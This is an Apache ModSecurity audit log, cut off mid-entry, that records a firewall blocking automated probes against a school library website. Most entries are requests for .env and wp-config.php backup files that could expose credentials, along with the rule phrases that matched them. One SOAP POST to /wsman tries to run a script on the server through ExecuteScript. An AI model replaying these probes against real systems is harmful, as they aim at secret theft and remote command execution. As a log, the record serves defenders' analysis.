Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0ad22b67-Z-- --05353206-A-- [04/Jun/2025:06:15:13 +0700] aD-CAdhPZJx8OfNaLCownQAAAMI 103.236.140.4 44034 103.236.140.4 8181 --05353206-B-- GET /.env.staging.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 139.162.28.194 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 139.162.28.194 Accept-Encoding: gzip X-Varnish: 162521340 --05353206-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --05353206-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748992513176393 664 (- - -) Stopwatch2: 1748992513176393 664; combined=257, p1=227, p2=0, p3=0, p4=0, p5=30, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --05353206-Z-- --9b695660-A-- [04/Jun/2025:06:15:13 +0700] aD-CAZLmnxTwEPX7IubOxgAAAIw 103.236.140.4 44038 103.236.140.4 8181 --9b695660-B-- GET /.env.test.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 139.162.28.194 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 139.162.28.194 Accept-Encoding: gzip X-Varnish: 172603475 --9b695660-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --9b695660-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748992513994027 929 (- - -) Stopwatch2: 1748992513994027 929; combined=353, p1=311, p2=0, p3=0, p4=0, p5=42, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9b695660-Z-- --c1e4e001-A-- [04/Jun/2025:06:15:14 +0700] aD-CAjNXNn6zAsHj7JAXKwAAAEE 103.236.140.4 44042 103.236.140.4 8181 --c1e4e001-B-- GET /.env.testing.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 139.162.28.194 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 139.162.28.194 Accept-Encoding: gzip X-Varnish: 162521343 --c1e4e001-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --c1e4e001-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748992514634677 805 (- - -) Stopwatch2: 1748992514634677 805; combined=307, p1=268, p2=0, p3=0, p4=0, p5=39, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c1e4e001-Z-- --c8a3ef4a-A-- [04/Jun/2025:06:15:15 +0700] aD-CAzNXNn6zAsHj7JAXLAAAAEA 103.236.140.4 44046 103.236.140.4 8181 --c8a3ef4a-B-- GET /.env1.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 139.162.28.194 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 139.162.28.194 Accept-Encoding: gzip X-Varnish: 172603478 --c8a3ef4a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --c8a3ef4a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748992515924882 696 (- - -) Stopwatch2: 1748992515924882 696; combined=275, p1=243, p2=0, p3=0, p4=0, p5=32, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c8a3ef4a-Z-- --a229e74e-A-- [04/Jun/2025:06:15:21 +0700] aD-CCdhPZJx8OfNaLCowngAAAMU 103.236.140.4 44050 103.236.140.4 8181 --a229e74e-B-- GET /.env2.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 139.162.28.194 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 139.162.28.194 Accept-Encoding: gzip X-Varnish: 162521346 --a229e74e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --a229e74e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748992521953661 881 (- - -) Stopwatch2: 1748992521953661 881; combined=360, p1=310, p2=0, p3=0, p4=0, p5=50, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a229e74e-Z-- --3eb68f69-A-- [04/Jun/2025:06:15:23 +0700] aD-CC5LmnxTwEPX7IubOyAAAAI8 103.236.140.4 44054 103.236.140.4 8181 --3eb68f69-B-- GET /.env_dev.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 139.162.28.194 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 139.162.28.194 Accept-Encoding: gzip X-Varnish: 162521349 --3eb68f69-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --3eb68f69-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748992523981710 646 (- - -) Stopwatch2: 1748992523981710 646; combined=292, p1=256, p2=0, p3=0, p4=0, p5=36, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3eb68f69-Z-- --d898ee54-A-- [04/Jun/2025:06:15:26 +0700] aD-CDpLmnxTwEPX7IubOyQAAAJI 103.236.140.4 44060 103.236.140.4 8181 --d898ee54-B-- GET /.env_prod.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 139.162.28.194 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 139.162.28.194 Accept-Encoding: gzip X-Varnish: 172603484 --d898ee54-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --d898ee54-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748992526513723 680 (- - -) Stopwatch2: 1748992526513723 680; combined=264, p1=231, p2=0, p3=0, p4=0, p5=33, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d898ee54-Z-- --51b99f6e-A-- [04/Jun/2025:06:15:32 +0700] aD-CFJLmnxTwEPX7IubOygAAAJE 103.236.140.4 44064 103.236.140.4 8181 --51b99f6e-B-- GET /.environment.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 139.162.28.194 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 139.162.28.194 Accept-Encoding: gzip X-Varnish: 162521352 --51b99f6e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --51b99f6e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748992532003980 681 (- - -) Stopwatch2: 1748992532003980 681; combined=254, p1=222, p2=0, p3=0, p4=0, p5=32, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --51b99f6e-Z-- --70474854-A-- [04/Jun/2025:06:25:49 +0700] aD-EfZLmnxTwEPX7IubPDgAAAJc 103.236.140.4 44640 103.236.140.4 8181 --70474854-B-- POST /wsman HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 1709 User-Agent: Mozilla/5.0 (Kubuntu; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0 Content-Type: application/soap+xml;charset=UTF-8 X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 172603754 --70474854-C-- HTTP://perpustakaan.smkn22jakarta.sch.id/wsman/ http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteScript 102400 uuid:00B60932-CC01-0005-0000-000000010000 PT1M30S root/scx aWQ= 0 true --70474854-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --70474854-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "TX:0=application/soap+xml"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1748993149086710 4405 (- - -) Stopwatch2: 1748993149086710 4405; combined=2669, p1=552, p2=2022, p3=30, p4=36, p5=28, sr=80, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --70474854-Z-- --2db96177-A-- [04/Jun/2025:06:27:29 +0700] aD-E4ZLmnxTwEPX7IubPGwAAAI8 103.236.140.4 44818 103.236.140.4 8181 --2db96177-B-- GET /.wp-config.php.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 139.162.28.194 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 139.162.28.194 Accept-Encoding: gzip X-Varnish: 172786350 --2db96177-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --2db96177-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748993249549387 955 (- - -) Stopwatch2: 1748993249549387 955; combined=407, p1=374, p2=0, p3=0, p4=0, p5=33, sr=156, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2db96177-Z-- --41208d65-A-- [04/Jun/2025:06:27:37 +0700] aD-E6dhPZJx8OfNaLCow8AAAAMg 103.236.140.4 44828 103.236.140.4 8181 --41208d65-B-- GET /.wp-config.php.swm HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 139.162.28.194 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 139.162.28.194 Accept-Encoding: gzip X-Varnish: 172786353 --41208d65-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --41208d65-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748993257927488 884 (- - -) Stopwatch2: 1748993257927488 884; combined=366, p1=324, p2=0, p3=0, p4=0, p5=41, sr=80, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --41208d65-Z-- --b5a9cb7c-A-- [04/Jun/2025:06:27:49 +0700] aD-E9dhPZJx8OfNaLCow8gAAAMs 103.236.140.4 44832 103.236.140.4 8181 --b5a9cb7c-B-- GET /.wp-config.php.swn HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 139.162.28.194 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 139.162.28.194 Accept-Encoding: gzip X-Varnish: 172786356 --b5a9cb7c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --b5a9cb7c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748993269828719 760 (- - -) Stopwatch2: 1748993269828719 760; combined=357, p1=317, p2=0, p3=0, p4=0, p5=40, sr=84, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b5a9cb7c-Z-- --56342a29-A-- [04/Jun/2025:06:27:51 +0700] aD-E99hPZJx8OfNaLCow8wAAAM0 103.236.140.4 44838 103.236.140.4 8181 --56342a29-B-- GET /.wp-config.php.swo HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 139.162.28.194 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 139.162.28.194 Accept-Encoding: gzip X-Varnish: 171315470 --56342a29-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --56342a29-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748993271267882 683 (- - -) Stopwatch2: 1748993271267882 683; combined=249, p1=223, p2=0, p3=0, p4=0, p5=26, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --56342a29-Z-- --6b299550-A-- [04/Jun/2025:06:27:53 +0700] aD-E-dhPZJx8OfNaLCow9AAAAM8 103.236.140.4 44842 103.236.140.4 8181 --6b299550-B-- GET /.wp-config.php.swp HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 139.162.28.194 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 139.162.28.194 Accept-Encoding: gzip X-Varnish: 172786359 --6b299550-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --6b299550-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748993273831596 737 (- - -) Stopwatch2: 1748993273831596 737; combined=338, p1=305, p2=0, p3=0, p4=0, p5=33, sr=147, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6b299550-Z-- --8be4612e-A-- [04/Jun/2025:06:34:20 +0700] aD-GfDNXNn6zAsHj7JAXjwAAAFI 103.236.140.4 45142 103.236.140.4 8181 --8be4612e-B-- GET /404.php.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 139.162.28.194 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 139.162.28.194 Accept-Encoding: gzip X-Varnish: 171315659 --8be4612e-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --8be4612e-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".php.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748993660725185 2534 (- - -) Stopwatch2: 1748993660725185 2534; combined=937, p1=501, p2=407, p3=0, p4=0, p5=29, sr=155, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8be4612e-Z-- --c3d45f20-A-- [04/Jun/2025:06:57:42 +0700] aD-L9l_DvM40jZomokt_CQAAABg 103.236.140.4 46178 103.236.140.4 8181 --c3d45f20-B-- GET /admin/config.php.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 139.162.28.194 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 139.162.28.194 Accept-Encoding: gzip X-Varnish: 172787181 --c3d45f20-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --c3d45f20-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".php.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748995062333927 1757 (- - -) Stopwatch2: 1748995062333927 1757; combined=601, p1=339, p2=236, p3=0, p4=0, p5=26, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c3d45f20-Z-- --d16e0a61-A-- [04/Jun/2025:06:57:54 +0700] aD-MAl_DvM40jZomokt_DQAAAAU 103.236.140.4 46188 103.236.140.4 8181 --d16e0a61-B-- GET /admin/configuration.php.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 139.162.28.194 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 139.162.28.194 Accept-Encoding: gzip X-Varnish: 173092320 --d16e0a61-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --d16e0a61-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".php.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748995074730123 2538 (- - -) Stopwatch2: 1748995074730123 2538; combined=787, p1=459, p2=297, p3=0, p4=0, p5=31, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d16e0a61-Z-- --d59b9f46-A-- [04/Jun/2025:06:58:51 +0700] aD-MO1_DvM40jZomokt_HAAAAAY 103.236.140.4 46228 103.236.140.4 8181 --d59b9f46-B-- GET /admin/database.php.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 139.162.28.194 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 139.162.28.194 Accept-Encoding: gzip X-Varnish: 172787208 --d59b9f46-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --d59b9f46-H-- Message: Access denied with code 403 (phase 2). Match of 